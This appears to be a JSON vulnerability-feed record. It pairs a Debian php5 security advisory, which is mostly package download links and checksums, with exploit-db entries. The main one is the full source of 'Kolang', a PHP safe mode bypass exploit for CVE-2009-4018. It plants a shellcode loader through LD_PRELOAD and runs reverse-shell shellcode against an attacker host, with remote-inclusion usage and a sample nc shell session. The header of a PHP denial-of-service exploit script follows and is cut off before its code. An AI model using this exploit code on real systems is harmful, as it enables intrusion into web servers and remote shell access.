http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 19186 039739727c969ae6c25c348bd584f308\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 
checksum: 14748 195f6978bf4394c85ff29e6fa6e6b62e\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 26794 f6444569a73747e3af80ff9a29d1d83f\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 20248 f08b3c2c32dfa446597e2e547d369165\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 2442822 a5e8104d5220100ae63c2fa8be88ff1d\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 38020 144dec220e3b04d64529366003e64160\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 70372 3df17ffe299b4f732a241eac4b4be86d\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 37104 a0a82ea304f529c99a01991ff433c258\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 6358 6cf2471c4684a7d8cdf442e47b6eecc6\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 10120 184db6b188224ddabd99e02b99d42656\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 12706 bf2487d7133fb20a786798ea966439d9\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch16_powerpc.deb\n Size/MD5 checksum: 54070 7d4da5803bcec2b8687971d4f826f272\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 72606 bb53ebeb6d65b15005186f192b77332f\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 13440 9d20d8ec53d583b78af04c845716dea4\n 
http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 4894934 b445a7233feb1a8285dc4f87e46aa1d9\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 19578 77ddd8c5eedb176c19bb82edeb16c3d7\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 40520 f033a73a6c669beb1189b016d7210e42\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 39220 4c7dfb5a9a8eb13ba7ee5fdab08203c0\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 37180 a9760ec96826ef65daa6b9cb779d6e99\n http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 2536020 4559ac57af97f5988efa4570c77fb745\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 5472 83c382dacd87173219abc1a9543af799\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 18178 ee440d491a3d656d1d28ce203021cec7\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 37272 50f97cab1e56bfd5b129a934566a6447\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 2537052 5de9a94cebf414fe23d373f23221eaf8\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 222178 9fa9899c68f61293c3a83156fde47d6d\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 342138 2fe9217a1b163ccf6389c68fe64f1029\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 25034 
501e91a5589aa6d7b4c5cb9a08c66528\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 9186 029a0c56c6192852104f25ce2502d364\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 2466010 c79086d9f7f8a4ccb94882b88de82f4e\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 11952 378f76c9ec6476bd364c755c826d194d\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 19324 253c859ad559f472a175f90ef39f85d7\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 36168 135fadc4f0170dc0e916e8ac07726caf\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 13392 e9caa124604abe127e3f8e26cce6285d\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 56348 f69f6d27de79f0319c379d2ee3e24b1c\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch16_s390.deb\n Size/MD5 checksum: 5128 30ed87f0fa3cec857d61b4a81913c982\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 47972 6257d4cf3f47f1ed1d25931415bd2ba1\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 32608 1a8b314a54080ec3434594b2c3dc7a55\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 8276 b383dfabe124b614db8c4cb9e43e8ad7\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 33304 ccdcd515bba4b0af5018f4c0c47c48d5\n 
http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 11682 46820ee8d403abcab89012b399608acb\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 4874 fcdedd828dfeaad9b080013299a3c0f8\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 217762 fd9a30ba4d8229705db1f75c485dea44\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 34924 6757f07e78caf4a711aa8c59f6c1b5ab\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 4652 f25f72b067ae1a31b6e2aa1a451845ff\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 12632 5fcc1542c1d08b059fb660660575f4c1\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 24658 ff5ac84362babb6d566032efd1189676\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 61848 683a404b8e4bc0e1f8f077d03ac478d4\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 345116 9d302a8d9835e1eb69e58e0b4246b77c\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 16250 79ab057b5b3ec5618cc5864a6e4a4004\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 16586 71f02e0d46f51ddb3ed48c39bbac8d17\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 2334202 793e4680be0b5a56dd884842e3a3d27b\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0+dfsg-8+etch16_sparc.deb\n Size/MD5 checksum: 10770 
Debian GNU/Linux 5.0 (stable) alias lenny
-----------------------------------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 7222 27d77bf832f9fa3cd6a22e56c43f29cd\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 77076 c40f6796e97717034eb0dc48e7672c97\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 60226 3332c67d7dd725f69b3feaa027432ebe\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 2559120 e185342a100d9c1a6c324b6bd8348329\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 28050 89733a4b7c5c0f82ab6d98bdfdc0904c\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny4_powerpc.deb\n Size/MD5 checksum: 9007430 f80ca9c8341ea5cad05a381901f818d3\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 9356 56a344de471f799626465b39711416d9\n http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 5230158 96112cf26d0089d9d2efac1a08c9580c\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 36318 5cd8828dc17f7e532f6cb6da218679b3\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 14188 c53279b33f59d0e59b75cc94fde8c63e\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 28246 d95b59b18e9c017d7531ab3ded0589f7\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 12362 122c0ce63bb0b6f1a47bc4125c0eefa5\n 
http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 2697694 c7ffdcfcb631e374ab084a5f3a989306\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 41960 1141ba26f14d750e4c765f60b62c6083\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 362724 c993784ed600577e353baaed00bea5f4\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 9065776 9783f66f3d79189473aa07331495b42f\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 2634090 54348da8b9648358d62658be37a8a72d\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 39718 aeead9b2523b76d4c2de2d195be14e0a\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 14002 63dae36e061720e94881db620ed33960\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 18600 2633eff8bca65e3dc772922913d0d222\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 38346 6a9c83cc55c6a828236901c20358b276\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 369974 2731c72660d16fd12fb8b6956da74e94\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 37990 416dde4d1c408b50c1549be51ef4eed2\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 73810 7c7df745c1d39056a1d4a7283eeffb5e\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 
checksum: 5592 31e7047d94f0938ab3a4b62fa5932b23\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 2699302 e0b0afb1d5ecde8c93eaffab06e6bd2f\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 15530 aedea8fda2c1c9cafe317b48e4c7cf8b\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 58566 60ced2f87243f641eb0db9ab58165668\n http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 25194 835ed177060f54073dcce45b8166490d\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 20684 7db377c886fb208d1d4769814442a1d5\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny4_s390.deb\n Size/MD5 checksum: 5300 8ca0fa30c94c14ebea24e46df78ef76d\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/p/php5/php5-dbg_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 8391240 ac3b24fe2c94b6b60f81e82d1dbe733c\n http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 5018 70ad7f1d15ac89a0f7886587d607cac0\n http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 11212 cd6b537b33f8ad26d9ba156e20e776ea\n http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 49796 3596f22c8bd2c544352cf0d9b3bda9b3\n http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 16536 b04adeb58919b0acaaaf6d85daf261e7\n http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 13094 6eaa2cad1739078bbe77608d6e9402f3\n 
http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 4819058 82d9d067a49433234d0aa27e485c7e49\n http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 4814 1d92ce69b9a900410000661e37f13d78\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 2474432 429e7bb0c573e280a2f37be8a1219821\n http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 8198 c246840d64024920e3b13b77ec7a1547\n http://security.debian.org/pool/updates/main/p/php5/php5-interbase_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 43994 55de49a1ecd5a79cd2bb3ad4b316a17b\n http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 2475470 20c826e1c15faafbf10168383ac03785\n http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 365376 4fc32fdeaff717f88d2e811041ac4191\n http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 34078 7df2d213d28ea42dbea22c9ba97f9b5d\n http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 32892 31e0f5a679abac892eddf816ea2d8255\n http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 2425906 146247c275cdf061697d3dc22831035e\n http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 367108 cea847606b0797e999585db57fe03b81\n http://security.debian.org/pool/updates/main/p/php5/php5-gmp_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 13454 b5392b750166a2add3efc308486df197\n 
http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 24310 d3dbee9f6b7f6068b2d45c57b50df77b\n http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 62862 214758c2104dc3ed2100c39513e9635f\n http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 17492 0845452499413beff2ebd12867c6e6d4\n http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 35954 23ecc855077d61fe5d2d35e1c7e4e4ca\n http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 12324 6c2ee5f17f1d95c24fada5784163df2f\n http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 24362 721e0d84ff3b0d5947bfea13d009bcb4\n http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 32964 eb58bb0af7602ea6eb7f47612cfbb1bb\n http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.6.dfsg.1-1+lenny4_sparc.deb\n Size/MD5 checksum: 32512 5cbc110ce6fd2fced13c1c388bed9ced\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 7, "modified": "2009-11-25T21:51:39", "published": "2009-11-25T21:51:39", "id": "DEBIAN:DSA-1940-1:73225", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00263.html", "title": "[SECURITY] [DSA-1940-1] New php5 packages fix several 
issues", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-01T14:43:52", "description": "Kolang (proc_open PHP safe mode bypass 4.3.10 - 5.3.0). CVE-2009-4018. Webapps exploit for php platform", "published": "2010-03-05T00:00:00", "type": "exploitdb", "title": "Kolang proc_open PHP safe mode bypass 4.3.10 - 5.3.0", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4018"], "modified": "2010-03-05T00:00:00", "id": "EDB-ID:11636", "href": "https://www.exploit-db.com/exploits/11636/", "sourceData": "<?php\r\n/*\r\nKolang (PHP Safe mode bypass)\r\n(IHSteam priv8 for lazy penetration testers)\r\n\r\n(php 4.3.10 - 5.3.0)\r\nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4018 (12/19/2009)\r\nhttp://www.milw0rm.com/exploits/7393 (12/09/2008)\r\n\r\n1- Kolang can be used directly in file inclusion RFI&LFI vulnerabilities (no upload required)\r\n2- Kolang can execute arbitrary shellcode (just for fans of metasploit )\r\n\r\n~~~~ How to use:)\r\n\r\nfor linux:\r\n\tkolang.php?os=linux&host=LHOST&port=LPORT\r\n\tor \r\n\tkolang.php?os=linux&shell=BASE64_ENCODED_SHELLCODE\r\n\r\nfor freebsd:\r\n\tkolang.php?os=freebsd&shell=BASE64_ENCODED_SHELLCODE\r\n\r\nfile inclusion :\r\n\thttp://host/vul.php?path=http://attacker/kolang.txt?&os=linux&host=LHOST&port=LPORT\r\n\r\n\r\nhttp://localhost/kolang.php?host=localhost&port=2121\r\nhamid@bugtraq ~ $ nc -vv -l -p 2121\r\nlistening on [any] 2121 ...\r\nconnect to [127.0.0.1] from bugtraq [127.0.0.1] 40526\r\nid\r\nuid=65534(nobody) gid=65533(nogroup) groups=65533(nogroup)\r\n\r\n\r\nHamid Ebadi\r\nhttp://www.bugtraq.ir\r\ncontact : ebadi~bugtraq~ir\r\n\r\nKolang means pickaxe (the idea came from amnafzar naming convention)\r\n(Separ, Sarand, Alak, Skort)\r\n*/\r\n\r\n\r\n$port= intval($_REQUEST['port']);\r\n$host= $_REQUEST['host'];\r\n$os= $_REQUEST['os'];\r\n\r\n/*\r\n\r\n\r\n//compile : cc -o shellcode.so -fPIC -shared 
shellcode.c\r\n//\r\n//<?php\r\n//$data=file_get_contents('shellcode.so');\r\n//file_put_contents('shellcode_base64.txt',$data);\r\n//?>\r\n\r\n\r\n\r\n\r\n// \"shellcode loader\" : load and execute arbitrary shellcode from a file\r\n// Hamid Ebadi\r\n#define O_RDONLY 00 ; fcntl.h\r\n#define SHELLCODE_MAX_SIZE 1024\r\n// change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'\r\n#define SHELLCODE_FILENAME \"/tmp/.X11-IHSTEAM\"\r\n\r\nvoid getuid()\r\n{\r\n\tunsetenv(\"LD_PRELOAD\"); //not really necessary, we can remove it\r\n\tint fd;\r\n\tchar shellcode[SHELLCODE_MAX_SIZE];\r\n\tchar filename[]=SHELLCODE_FILENAME ;\r\n\t// we can also pass the shellcode in program's arguments\r\n\tif ((fd = open(SHELLCODE_FILENAME,O_RDONLY)) < 0) {\r\n\texit(1);\r\n\t}\r\n\tif (read(fd,shellcode,SHELLCODE_MAX_SIZE) < 0){\r\n\texit(1);\r\n\t}\r\n\t(*(void(*)()) shellcode)();\r\n}\r\n\r\n*/\r\n\r\nif ($_REQUEST['os']=='freebsd'){\r\n// freebsd shellcode loader (x86)\r\n$shellcode_loader=\r\n\"[base64 data removed]\";\r\n}else{\r\n// default: linux\r\n// linux shellcode loader (x86)\r\n$shellcode_loader=\r\n\"[base64 data removed]\" ;\r\n}\r\n\r\nif (!function_exists('file_put_contents')){\r\n function file_put_contents($filename, $data){\r\n $f = @fopen($filename, 'w');\r\n if (!$f){\r\n return false;\r\n }\r\n else{\r\n $bytes = fwrite($f, $data);\r\n fclose($f);\r\n return $bytes;\r\n }\r\n }\r\n}\r\n\r\n// Note: change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'\r\nfile_put_contents('/tmp/shellcode.so' , base64_decode($shellcode_loader));\r\n$ip = gethostbyname($host);\r\n\r\n$port1 = sprintf('%c', ($port>> 8)&255 );\r\n$port2 = sprintf('%c', ($port>> 0)&255 );\r\n\r\n$part = explode('.', $ip);\r\n//$HEXIP = sprintf('%02x%02x%02x%02x', $part[0], $part[1], $part[2], $part[3]);\r\n$STRINGIP = sprintf('%c%c%c%c', $part[0], 
$part[1], $part[2], $part[3]);\r\n\r\n/*\r\n * linux/x86/shell_reverse_tcp - 71 bytes\r\n * http://www.metasploit.com\r\n * Encoder: generic/none\r\n * LHOST=$STRINGIP, LPORT=$port1.$port2, ReverseConnectRetries=5,\r\n * PrependSetresuid=false, PrependSetreuid=false,\r\n * PrependSetuid=false, PrependChrootBreak=false,\r\n * AppendExit=false\r\n */\r\n\r\n\r\n$Xshellcode =\r\n\"\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80\".\r\n\"\\x5b\\x5e\\x68\".$STRINGIP.\"\\x66\\x68\".$port1.$port2.\"\\x66\\x53\\x6a\\x10\".\r\n\"\\x51\\x50\\x89\\xe1\\x43\\x6a\\x66\\x58\\xcd\\x80\\x59\\x87\\xd9\\xb0\\x3f\".\r\n\"\\xcd\\x80\\x49\\x79\\xf9\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\".\r\n\"\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\\x00\" ;\r\n\r\nif(isset($_REQUEST['shellcode'])){\r\n// just for fans of metasploit\r\n$Xshellcode=base64_decode($_REQUEST['shellcode']);\r\n}\r\n\r\nfile_put_contents(\"/tmp/.X11-IHSTEAM\", $Xshellcode);\r\n\r\n$cwd = '/tmp/';\r\n$env = array('LD_PRELOAD' => '/tmp/shellcode.so');\r\nunset($var);\r\n\r\n$descriptorspec = array(0 => array(\"pipe\", \"r\"), 1 => array(\"pipe\", \"w\"));\r\n\r\n// BOOM\r\nproc_open('IHSteam', $descriptorspec, $var, $cwd, $env);\r\nmail(\"IHSteam\",\"IHSteam\",\"IHSteam\",\"IHSteam\");\r\n?>\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/11636/"}, {"lastseen": "2016-02-01T12:06:31", "description": "PHP \"multipart/form-data\" Denial of Service Exploit (Python). CVE-2009-4017. 
Dos exploit for php platform", "published": "2009-11-27T00:00:00", "type": "exploitdb", "title": "PHP < 5.3.1 - \"multipart/form-data\" Denial of Service Exploit Python", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4017"], "modified": "2009-11-27T00:00:00", "id": "EDB-ID:10242", "href": "https://www.exploit-db.com/exploits/10242/", "sourceData": "#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n#\r\n# Author:\r\n# Eren Turkay <eren .-. pardus.org.tr>, 2009/11/20\r\n# http://www.pardus.org.tr/eng/\r\n#\r\n# Credits:\r\n# Bogdan Calin from Acunetix\r\n#\r\n# Description:\r\n# Exploit to cause denial of service on any host that runs PHP via temporary\r\n# file exhaustion. It doesn't matter whether the script handles uploads or not.\r\n# If host runs PHP, it is enough to cause DoS using any PHP script it serves.\r\n#\r\n# This is the implementation of disclosed vulnerability that was found\r\n# by Bogdan Calin. See: http://www.acunetix.com/blog/websecuritynews/php-multipartform-data-denial-of-service/\r\n#\r\n# Affected versions:\r\n# All PHP versions before PHP 5.3.1 and unpatched 5.2.11\r\n#\r\n# Platforms:\r\n# Windows, Linux, Mac\r\n#\r\n# Fix:\r\n# Update to 5.3.1. If you use 5.2.11 and can't update, apply the patch [0]:\r\n#\r\n# [0] http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/main/rfc1867.c?r1=272374&r2=289990&view=patch (introduce max_file_upload)\r\n# [0] http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/main/main.c?r1=289214&r2=289990&view=patch (NOTE: upstream changed 100 to 20, do it so)\r\n#\r\n# Usage:\r\n# python php-multipart-dos.py <site> <port> </index.php> <num of child: optional>\r\n#\r\n# After opening childs, you may wait long for threads to finish because sending such a huge data is painful.\r\n# However, it's not important to finish the request. Openining lots of connections and sending huge data fastly will enough to cause DoS.\r\n# 